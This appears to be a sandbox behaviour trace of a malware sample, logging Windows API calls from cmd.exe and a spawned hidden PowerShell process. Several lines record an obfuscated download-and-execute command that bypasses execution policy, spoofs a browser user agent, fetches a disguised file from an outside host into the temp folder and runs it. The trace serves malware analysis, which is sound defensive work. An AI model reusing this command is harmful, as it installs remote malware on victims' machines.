	[0082.202] GetEnvironmentStringsW () returned 0x248f20*
	[0082.202] GetProcessHeap () returned 0x230000
	[0082.202] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xad4) returned 0x249a00
	[0082.202] FreeEnvironmentStringsW (penv=0x248f20) returned 1
	[0082.202] GetProcessHeap () returned 0x230000
	[0082.202] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x8) returned 0x2487a0
	[0082.202] GetEnvironmentStringsW () returned 0x248f20*
	[0082.202] GetProcessHeap () returned 0x230000
	[0082.202] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xad4) returned 0x24a4e0
	[0082.202] FreeEnvironmentStringsW (penv=0x248f20) returned 1
	[0082.202] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e718 | out: phkResult=0x20e718*=0x44) returned 0x0
	[0082.202] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x0, lpData=0x20e730*=0x18, lpcbData=0x20e714*=0x1000) returned 0x2
	[0082.202] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x4, lpData=0x20e730*=0x1, lpcbData=0x20e714*=0x4) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x0, lpData=0x20e730*=0x1, lpcbData=0x20e714*=0x1000) returned 0x2
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x4, lpData=0x20e730*=0x0, lpcbData=0x20e714*=0x4) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x4, lpData=0x20e730*=0x40, lpcbData=0x20e714*=0x4) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x4, lpData=0x20e730*=0x40, lpcbData=0x20e714*=0x4) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x0, lpData=0x20e730*=0x40, lpcbData=0x20e714*=0x1000) returned 0x2
	[0082.203] RegCloseKey (hKey=0x44) returned 0x0
	[0082.203] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e718 | out: phkResult=0x20e718*=0x44) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x0, lpData=0x20e730*=0x40, lpcbData=0x20e714*=0x1000) returned 0x2
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x4, lpData=0x20e730*=0x1, lpcbData=0x20e714*=0x4) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x0, lpData=0x20e730*=0x1, lpcbData=0x20e714*=0x1000) returned 0x2
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x4, lpData=0x20e730*=0x0, lpcbData=0x20e714*=0x4) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x4, lpData=0x20e730*=0x9, lpcbData=0x20e714*=0x4) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x4, lpData=0x20e730*=0x9, lpcbData=0x20e714*=0x4) returned 0x0
	[0082.203] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e710, lpData=0x20e730, lpcbData=0x20e714*=0x1000 | out: lpType=0x20e710*=0x0, lpData=0x20e730*=0x9, lpcbData=0x20e714*=0x1000) returned 0x2
	[0082.203] RegCloseKey (hKey=0x44) returned 0x0
	[0082.203] time (in: timer=0x0 | out: timer=0x0) returned 0x5d3b2e60
	[0082.203] srand (_Seed=0x5d3b2e60) 
	[0082.203] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0082.203] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	[0082.203] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0082.204] GetProcessHeap () returned 0x230000
	[0082.204] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x218) returned 0x248f20
	[0082.204] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x248f30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0082.204] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0082.204] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0082.204] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0082.204] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0082.204] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0082.204] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0082.204] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0082.204] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0082.204] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0082.204] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0082.204] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0082.204] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0082.204] GetProcessHeap () returned 0x230000
	[0082.204] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x249a00 | out: hHeap=0x230000) returned 1
	[0082.204] GetEnvironmentStringsW () returned 0x249140*
	[0082.204] GetProcessHeap () returned 0x230000
	[0082.204] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xaec) returned 0x24bad0
	[0082.205] FreeEnvironmentStringsW (penv=0x249140) returned 1
	[0082.205] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0082.205] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0082.205] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0082.205] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0082.205] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0082.205] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0082.205] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0082.205] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0082.205] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0082.205] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0082.205] GetProcessHeap () returned 0x230000
	[0082.205] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x248d80
	[0082.205] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f520 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0082.205] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x104, lpBuffer=0x20f520, lpFilePart=0x20f500 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x20f500*="Documents") returned 0x1b
	[0082.205] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0082.205] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f230 | out: lpFindFileData=0x20f230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Users", cAlternateFileName="")) returned 0x24c5d0
	[0082.205] FindClose (in: hFindFile=0x24c5d0 | out: hFindFile=0x24c5d0) returned 1
	[0082.205] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz", lpFindFileData=0x20f230 | out: lpFindFileData=0x20f230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="aETAdzjz", cAlternateFileName="")) returned 0x24c5d0
	[0082.205] FindClose (in: hFindFile=0x24c5d0 | out: hFindFile=0x24c5d0) returned 1
	[0082.206] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", lpFindFileData=0x20f230 | out: lpFindFileData=0x20f230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xae0000ae, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x24c5d0
	[0082.206] FindClose (in: hFindFile=0x24c5d0 | out: hFindFile=0x24c5d0) returned 1
	[0082.206] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16
	[0082.206] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 0x11
	[0082.206] SetCurrentDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents")) returned 1
	[0082.206] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\aETAdzjz\\Documents") returned 1
	[0082.206] GetProcessHeap () returned 0x230000
	[0082.206] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24bad0 | out: hHeap=0x230000) returned 1
	[0082.206] GetEnvironmentStringsW () returned 0x24afd0*
	[0082.206] GetProcessHeap () returned 0x230000
	[0082.206] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb2c) returned 0x24bb10
	[0082.206] FreeEnvironmentStringsW (penv=0x24afd0) returned 1
	[0082.206] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac8c0a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0082.206] GetProcessHeap () returned 0x230000
	[0082.206] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x248d80 | out: hHeap=0x230000) returned 1
	[0082.206] GetProcessHeap () returned 0x230000
	[0082.206] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4016) returned 0x24c650
	[0082.207] GetProcessHeap () returned 0x230000
	[0082.207] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x260) returned 0x249c80
	[0082.207] GetProcessHeap () returned 0x230000
	[0082.207] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24c650 | out: hHeap=0x230000) returned 1
	[0082.207] GetConsoleOutputCP () returned 0x1b5
	[0082.207] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac8bfe0 | out: lpCPInfo=0x4ac8bfe0) returned 1
	[0082.207] GetUserDefaultLCID () returned 0x409
	[0082.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac87b50, cchData=8 | out: lpLCData=":") returned 2
	[0082.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f630, cchData=128 | out: lpLCData="0") returned 2
	[0082.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f630, cchData=128 | out: lpLCData="0") returned 2
	[0082.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f630, cchData=128 | out: lpLCData="1") returned 2
	[0082.207] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac9a740, cchData=8 | out: lpLCData="/") returned 2
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac9a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac9a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac9a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac9a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac9a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac9a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac9a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac87b40, cchData=8 | out: lpLCData=".") returned 2
	[0082.208] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac9a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0082.208] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0082.209] GetProcessHeap () returned 0x230000
	[0082.209] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x20c) returned 0x249f60
	[0082.209] GetConsoleTitleW (in: lpConsoleTitle=0x249f60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0082.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77040000
	[0082.209] GetProcAddress (hModule=0x77040000, lpProcName="CopyFileExW") returned 0x770523d0
	[0082.209] GetProcAddress (hModule=0x77040000, lpProcName="IsDebuggerPresent") returned 0x77048290
	[0082.209] GetProcAddress (hModule=0x77040000, lpProcName="SetConsoleInputExeNameW") returned 0x770517e0
	[0082.209] GetProcessHeap () returned 0x230000
	[0082.209] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4012) returned 0x24c650
	[0082.209] GetProcessHeap () returned 0x230000
	[0082.209] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4010) returned 0x250670
	[0082.210] GetProcessHeap () returned 0x230000
	[0082.210] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1a) returned 0x2449a0
	[0082.210] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0082.210] GetProcessHeap () returned 0x230000
	[0082.210] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2449a0 | out: hHeap=0x230000) returned 1
	[0082.210] GetProcessHeap () returned 0x230000
	[0082.210] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x250670 | out: hHeap=0x230000) returned 1
	[0082.210] GetProcessHeap () returned 0x230000
	[0082.210] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4010) returned 0x250670
	[0082.210] GetProcessHeap () returned 0x230000
	[0082.210] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1a) returned 0x2449a0
	[0082.210] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp") returned 0x24
	[0082.210] GetProcessHeap () returned 0x230000
	[0082.210] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2449a0 | out: hHeap=0x230000) returned 1
	[0082.210] GetProcessHeap () returned 0x230000
	[0082.210] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x250670 | out: hHeap=0x230000) returned 1
	[0082.211] GetProcessHeap () returned 0x230000
	[0082.211] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24c650 | out: hHeap=0x230000) returned 1
	[0082.211] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2=")") returned 78
	[0082.211] _wcsicmp (_String1="FOR", _String2="WNjKdpGDFcPRHnV") returned -17
	[0082.211] _wcsicmp (_String1="FOR/?", _String2="WNjKdpGDFcPRHnV") returned -17
	[0082.212] _wcsicmp (_String1="IF", _String2="WNjKdpGDFcPRHnV") returned -14
	[0082.212] _wcsicmp (_String1="IF/?", _String2="WNjKdpGDFcPRHnV") returned -14
	[0082.212] _wcsicmp (_String1="REM", _String2="WNjKdpGDFcPRHnV") returned -5
	[0082.212] _wcsicmp (_String1="REM/?", _String2="WNjKdpGDFcPRHnV") returned -5
	[0082.212] GetProcessHeap () returned 0x230000
	[0082.212] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb0) returned 0x24a180
	[0082.212] GetProcessHeap () returned 0x230000
	[0082.212] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x2469a0
	[0082.212] GetProcessHeap () returned 0x230000
	[0082.212] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x14) returned 0x248d80
	[0082.212] GetProcessHeap () returned 0x230000
	[0082.212] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb0) returned 0x24a240
	[0082.301] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0082.301] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0082.301] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0082.301] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0082.301] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0082.301] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0082.301] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0082.301] GetProcessHeap () returned 0x230000
	[0082.301] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb0) returned 0x24a300
	[0082.301] GetProcessHeap () returned 0x230000
	[0082.301] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x2469e0

Process:
	id = "23"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x4a51f000"
	os_pid = "0xafc"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "22"
	os_parent_pid = "0xbcc"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 190
	os_tid = 0x9e4

	[0084.303] strcmp (_Str1="EEHeapAllocInProcessHeap", _Str2="CLRLoadLibraryEx") returned 1
	[0085.130] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0085.943] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0085.944] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0085.944] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0085.944] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0087.406] GetVersionExW (in: lpVersionInformation=0x13dd10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x13dd10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0087.408] GetVersionExW (in: lpVersionInformation=0x13dd10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x13dd10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0087.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.430] GetVersionExW (in: lpVersionInformation=0x13da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x13da80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0087.430] SetErrorMode (uMode=0x1) returned 0x1
	[0087.555] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x13dbe0 | out: lpFileInformation=0x13dbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0087.556] SetErrorMode (uMode=0x1) returned 0x1
	[0087.565] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x13de50 | out: lpdwHandle=0x13de50) returned 0x94c
	[0087.566] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d17370 | out: lpData=0x2d17370) returned 1
	[0087.568] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x13ddc8, puLen=0x13ddc0 | out: lplpBuffer=0x13ddc8*=0x2d1740c, puLen=0x13ddc0) returned 1
	[0087.571] lstrlenW (lpString="䅁") returned 1
	[0087.580] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d174e8, puLen=0x13dd30) returned 1
	[0087.581] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0087.583] CoTaskMemAlloc (cb=0x2e) returned 0x2780b0
	[0087.583] lstrcpyW (in: lpString1=0x2780b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0087.584] CoTaskMemFree (pv=0x2780b0) 
	[0087.584] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d1753c, puLen=0x13dd30) returned 1
	[0087.584] lstrlenW (lpString="System.Management.Automation") returned 28
	[0087.584] CoTaskMemAlloc (cb=0x3c) returned 0x20dc70
	[0087.584] lstrcpyW (in: lpString1=0x20dc70, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0087.584] CoTaskMemFree (pv=0x20dc70) 
	[0087.584] VerQueryValueW (in: pBlock=0x2d17370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x13dd38, puLen=0x13dd30 | out: lplpBuffer=0x13dd38*=0x2d17598, puLen=0x13dd30) returned 1
